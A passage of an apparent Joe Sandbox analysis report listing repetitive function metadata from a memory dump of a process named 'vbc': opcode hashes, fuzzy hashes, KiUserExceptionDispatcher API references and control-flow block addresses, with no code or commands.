                                                              • Instruction ID: aca9ef358297408d6e5a24240f3fc77fd4d2f66bd15dbd8c73dd1d773753c37b
                                                              • Opcode Fuzzy Hash: 2f361984e5b74b9c09e0a482c5de1e076561dbc7a593a5785181f191861e0529
                                                              • Instruction Fuzzy Hash: F1511370D002188FDF14CFA9C889BEDBBB1BF49318F158519E816AB390DB749848CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: d6ffb0f3ada26dcc80d8032266ad28c9d786c56957ae88969e77dd109a50c0af
                                                              • Instruction ID: 8be38a4699b138f9e3586aa2dcbccfe29f07dee5b257c0d51b9a2a221cbaabd9
                                                              • Opcode Fuzzy Hash: d6ffb0f3ada26dcc80d8032266ad28c9d786c56957ae88969e77dd109a50c0af
                                                              • Instruction Fuzzy Hash: 7902DB7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

APIs
• KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
• KiUserExceptionDispatcher.NTDLL ref: 09EE8718
Memory Dump Source
• Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 3ec3766bda92dd688adbebaea3487ebfd557d34213375ba8fcb4a1d93d7e412f
• Instruction ID: 6bdf08e5b9b81d55a1ca1b41c3740a6a0893c3fa75a21f364a611a22246e5eaf
• Opcode Fuzzy Hash: 3ec3766bda92dd688adbebaea3487ebfd557d34213375ba8fcb4a1d93d7e412f
• Instruction Fuzzy Hash: 7D02EB7490A298CFC766DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB359D81CF56
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
• KiUserExceptionDispatcher.NTDLL ref: 09EE8718
Memory Dump Source
• Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 83611b2097d38c24e7b7715de063125bd1f38b23664494f76ee19e3837be50e3
• Instruction ID: de8765c772564149620995e55a5a0b8d5059c62dea74bb5a4427c53876de60be
• Opcode Fuzzy Hash: 83611b2097d38c24e7b7715de063125bd1f38b23664494f76ee19e3837be50e3
• Instruction Fuzzy Hash: FE02DB7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
• KiUserExceptionDispatcher.NTDLL ref: 09EE8718
Memory Dump Source
• Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 7b6d9ec72fc5bd737eaa2a317d7f970171371f860dc65be987106c8764d0cdc8
• Instruction ID: 13d37a1d78f12a37a87d323651cda23b8131bc4216b4dd92f0a9fd9ce3a0639e
• Opcode Fuzzy Hash: 7b6d9ec72fc5bd737eaa2a317d7f970171371f860dc65be987106c8764d0cdc8
• Instruction Fuzzy Hash: 4302DB7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
• KiUserExceptionDispatcher.NTDLL ref: 09EE8718
Memory Dump Source
• Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 57abb7080ba08ae490db0a82a522d1c044ab899b3411815b64c317c8f6ba7bf6
• Instruction ID: 43d5a42c07a834367abdaa4fa732016b3234e41cf225eacf863b4fecea0a8432
• Opcode Fuzzy Hash: 57abb7080ba08ae490db0a82a522d1c044ab899b3411815b64c317c8f6ba7bf6
• Instruction Fuzzy Hash: C3F1EC7490A398CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
• KiUserExceptionDispatcher.NTDLL ref: 09EE8718
Memory Dump Source
• Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
• Opcode ID: 980a1a7af583437ec513b6befdbefaa9f151750386651c71bee7b6bafaa67e69
• Instruction ID: 01026b29269873fa8b99adade37087c59fd418ccec2447d1a7ef830f1a58ddae
• Opcode Fuzzy Hash: 980a1a7af583437ec513b6befdbefaa9f151750386651c71bee7b6bafaa67e69
• Instruction Fuzzy Hash: 07F1EC7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 6f429e950457e1c04246dfe50721e8324f97f6c5f9a21591af9278a3578b6dfa
                                                              • Instruction ID: 3f2a0658407e1667244ddf9da480bd23d11a4b02d9490dbaba6323e10df928e5
                                                              • Opcode Fuzzy Hash: 6f429e950457e1c04246dfe50721e8324f97f6c5f9a21591af9278a3578b6dfa
                                                              • Instruction Fuzzy Hash: 18F1ED7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Rendered graph (node list omitted): entry block 09EE7C0D-09EE7CB2 calls 09EE5A68 and 09EE5BF8, then joins the same chain as the previous function at 09EE7CB8 (19 basic blocks in total, ending at 09EE8737-09EE876D).
                                                              • The call at the end of each block is recorded with several targets in the 0A3F0000 region (0A3F202E and 0A3F2090 at 09EE7CB2, through 0A3FBA28 and 0A3FB892 at 09EE8454); block 09EE838E-09EE8454 also calls 0A3FA578 directly.
                                                              • Blocks 09EE7DC3-09EE7E5D and 09EE845A-09EE8730 reference KiUserExceptionDispatcher.
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 47d470275414471e573c93c975e7153b56c6d8ac38827845d41faaf3479f87b1
                                                              • Instruction ID: ce7e4d2e3f9ca4fb46c259a8779409f0b044133fe5ade28fe985a2b40efc49fa
                                                              • Opcode Fuzzy Hash: 47d470275414471e573c93c975e7153b56c6d8ac38827845d41faaf3479f87b1
                                                              • Instruction Fuzzy Hash: D2F1ED7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Rendered graph (node list omitted): entry block 09EE7C52-09EE7CB2 calls 09EE5A68 and 09EE5BF8, then joins the same chain as the previous functions at 09EE7CB8 (19 basic blocks in total, ending at 09EE8737-09EE876D).
                                                              • The call at the end of each block is recorded with several targets in the 0A3F0000 region (0A3F202E and 0A3F2090 at 09EE7CB2, through 0A3FBA28 and 0A3FB892 at 09EE8454); block 09EE838E-09EE8454 also calls 0A3FA578 directly.
                                                              • Blocks 09EE7DC3-09EE7E5D and 09EE845A-09EE8730 reference KiUserExceptionDispatcher.
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 40a556f8cfa82282a630191465c2997cf4d2581ca6f5c042a4be98a00590202e
                                                              • Instruction ID: f491709427070dc359ae331d9662a5d696e55f940240ac230bb764b05bdbbc6a
                                                              • Opcode Fuzzy Hash: 40a556f8cfa82282a630191465c2997cf4d2581ca6f5c042a4be98a00590202e
                                                              • Instruction Fuzzy Hash: 99F1ED7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              • Rendered graph (node list omitted): entry block 09EE7C8E-09EE7CB2 calls 09EE5A68 and 09EE5BF8, then joins the same chain as the previous functions at 09EE7CB8 (19 basic blocks in total, ending at 09EE8737-09EE876D).
                                                              • The call at the end of each block is recorded with several targets in the 0A3F0000 region (0A3F202E and 0A3F2090 at 09EE7CB2, through 0A3FBA28 and 0A3FB892 at 09EE8454); block 09EE838E-09EE8454 also calls 0A3FA578 directly.
                                                              • Blocks 09EE7DC3-09EE7E5D and 09EE845A-09EE8730 reference KiUserExceptionDispatcher.
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 8b4905a9301571eb2b7f779a5289c290ae6d0d3f228db9eb03a324ffa1915900
                                                              • Instruction ID: da04c8799f2ee3a777391bd0e8a0aeda6c56176c65e493e39b18d561015bcf99
                                                              • Opcode Fuzzy Hash: 8b4905a9301571eb2b7f779a5289c290ae6d0d3f228db9eb03a324ffa1915900
                                                              • Instruction Fuzzy Hash: 13E1DC7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 2059edb860438341efe14813ad5497c6f442b0c281074cfb0ae1cd34d7be956d
                                                              • Instruction ID: 0a3965cb13f929e965efeba66728340a8a65e42240bea646d638612a7c09f4bc
                                                              • Opcode Fuzzy Hash: 2059edb860438341efe14813ad5497c6f442b0c281074cfb0ae1cd34d7be956d
                                                              • Instruction Fuzzy Hash: 43E1EC7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 6ba54628ad69058459dfec402553a150bb4b1e52656f2c46b82da4504b21a6f3
                                                              • Instruction ID: b4f660afccdd45f7e922d95bc35d5538153b69310ba0a3f576bdc4901761774e
                                                              • Opcode Fuzzy Hash: 6ba54628ad69058459dfec402553a150bb4b1e52656f2c46b82da4504b21a6f3
                                                              • Instruction Fuzzy Hash: 34E1ED7490A298CFCB66DF74E8886A9B7B2FF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 1e88e3277f977af53dc89c1f4b2268f63485524e9e0c97bb437f30121a720211
                                                              • Instruction ID: 3968764d554559c0c153abbd00f8f13e54682d119dd84677384e47ccbaa128a1
                                                              • Opcode Fuzzy Hash: 1e88e3277f977af53dc89c1f4b2268f63485524e9e0c97bb437f30121a720211
                                                              • Instruction Fuzzy Hash: 9DE1EC7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 81ba3eef43a740523d96698ab6cf7606ea1eff2471fd09a55abced53f85a4c04
                                                              • Instruction ID: 1371ac4a5f2d29285874377242b88b3433bb054cc04ee23860dc9715216ce4ee
                                                              • Opcode Fuzzy Hash: 81ba3eef43a740523d96698ab6cf7606ea1eff2471fd09a55abced53f85a4c04
                                                              • Instruction Fuzzy Hash: A9D1FD7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 4fb6bf92e485aafba143ef565e8fe0782af778e18a7d3809690b514c9b1b1780
                                                              • Instruction ID: f07794db5d1827e9f4b4d8d2b69d9d68e0ae2e3e3774c0cc6d319f3dde9f080f
                                                              • Opcode Fuzzy Hash: 4fb6bf92e485aafba143ef565e8fe0782af778e18a7d3809690b514c9b1b1780
                                                              • Instruction Fuzzy Hash: 2CD1EC7490A298CFCB66DF74E8886ADB7B2BF4A34AF1041D9D40AA3740CB355E81CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 908f1840e0a7db8de94ff11fd6c2c53faab6d8f2551fca0b92c1fb3d325a31d3
                                                              • Instruction ID: 0064e6bd1652c23d598f39e115736632e3ac66e7c501e561149928e822dd9b25
                                                              • Opcode Fuzzy Hash: 908f1840e0a7db8de94ff11fd6c2c53faab6d8f2551fca0b92c1fb3d325a31d3
                                                              • Instruction Fuzzy Hash: 3BD1DC7490A298CFCB66DF34E8886ADB7B2BF4A34AF1041D9D40AA3740CB355E85CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: bb4131fd088bc7e77c82c29bdc48cc991648b334f4e3b4534d7fe990bfb565a2
                                                              • Instruction ID: ad3407f614c916de51ed87a3b27d86d4bee0bc55f2479b3c0284f9ed02aa4a90
                                                              • Opcode Fuzzy Hash: bb4131fd088bc7e77c82c29bdc48cc991648b334f4e3b4534d7fe990bfb565a2
                                                              • Instruction Fuzzy Hash: 8AC1CC7490A298CFCB66DF34E8886A9B7B2FF4A34AF1041D9D40AA3740CB355E85CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: d505c295c98d4333f4d51779ec2127293ab855cdf8c645c562a0353bc0cd5c41
                                                              • Instruction ID: fd72036695f152c1e8600e0bfd0a040421cf1a7c8e5a53b8bd6cc3d5bde41331
                                                              • Opcode Fuzzy Hash: d505c295c98d4333f4d51779ec2127293ab855cdf8c645c562a0353bc0cd5c41
                                                              • Instruction Fuzzy Hash: DBC1CB7490A298CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 994a58c7bc4c430e442a26648a831f9db1ca9213b15b7f68a544f8bef1194fe3
                                                              • Instruction ID: 3f4f63f3c25bf0cd675d0133201ddf74f16f27d4db8413dfb4e40a08de59d13a
                                                              • Opcode Fuzzy Hash: 994a58c7bc4c430e442a26648a831f9db1ca9213b15b7f68a544f8bef1194fe3
                                                              • Instruction Fuzzy Hash: EFC1CB7490A298CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 00cbd77139ca30a97d409fbdb42896ef2012f5f42db626c297a5a4d5cc4eb9b6
                                                              • Instruction ID: cbcdf204cd04036b7132f7b4fd2a47ad8317c601717406e45fcc46a1bcb11f74
                                                              • Opcode Fuzzy Hash: 00cbd77139ca30a97d409fbdb42896ef2012f5f42db626c297a5a4d5cc4eb9b6
                                                              • Instruction Fuzzy Hash: BEB1CB7490A298CFCB66DF34E8886A9B7B2FF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 0bb9241ba255442661085b627a2683d6a45d917fb6da949067e710135fd2fb34
                                                              • Instruction ID: 3c47022c812eefe8083437209d1bf01cc8fbdbded727aa9f9271cb09ff1692ea
                                                              • Opcode Fuzzy Hash: 0bb9241ba255442661085b627a2683d6a45d917fb6da949067e710135fd2fb34
                                                              • Instruction Fuzzy Hash: 3BB1CA7490A298CFCB66DF34E8886A9B7B2FF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: c001a993d04429354a9ec07c6656dcddb14a7e28ca394955f869078076d91901
                                                              • Instruction ID: 73542db0f45f79798c4556620f8fc569f5853af602bb01abfd321dc2909ed223
                                                              • Opcode Fuzzy Hash: c001a993d04429354a9ec07c6656dcddb14a7e28ca394955f869078076d91901
                                                              • Instruction Fuzzy Hash: 78B1DA7490A298CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 5303f0b17ed0d40a9f689dafa8ab51004b3b460f4598759b8d27881fe1dd8819
                                                              • Instruction ID: 1d3196ef0b28371154165901178e497825266796d32ce0cfe58d2bb85e359689
                                                              • Opcode Fuzzy Hash: 5303f0b17ed0d40a9f689dafa8ab51004b3b460f4598759b8d27881fe1dd8819
                                                              • Instruction Fuzzy Hash: 56A1EA7490A298CFCB66DF34E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: ba2bdf1ea5dc0bce2de179c834d59d7ca799dde90af2e56156a3a33f51d3bd83
                                                              • Instruction ID: 9e785996a7048a09e109d696331365a017ec45fcc6b5d63433da602b31a05115
                                                              • Opcode Fuzzy Hash: ba2bdf1ea5dc0bce2de179c834d59d7ca799dde90af2e56156a3a33f51d3bd83
                                                              • Instruction Fuzzy Hash: C1A1EB7490A398CFCB66DF34E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: eb083aae321c77b18ee3798daa344f27b39b8abb48c048692099207c9a4b1e0c
                                                              • Instruction ID: 4159764ebe122b52ded3688dc8caba0fa65f653ed2e89df9ad1619b3c9db8a03
                                                              • Opcode Fuzzy Hash: eb083aae321c77b18ee3798daa344f27b39b8abb48c048692099207c9a4b1e0c
                                                              • Instruction Fuzzy Hash: 7791EA7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D85CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: c344b183ffc5036deca35aaa944da5ec615f0284fd9ec0a224ad969f903a069a
                                                              • Instruction ID: da636824b82986ebd5b328fed4ef65a73244923fa662546c29d971b64d4f7e97
                                                              • Opcode Fuzzy Hash: c344b183ffc5036deca35aaa944da5ec615f0284fd9ec0a224ad969f903a069a
                                                              • Instruction Fuzzy Hash: DE91FA7490A298CFCB66DF34E8886ADB7B2BF4A34AF1041D9D40AA3740CB355D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.548516227.000000000A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a3f0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3578e99cc5c4ee51b20c7d2e7b768c0b91a9c74c4d3345eea400bb590d78fcb5
                                                              • Instruction ID: 42058042472cb023d9b6232596b55be1de2f4b098ef19e6e0d0d0a108be34f7f
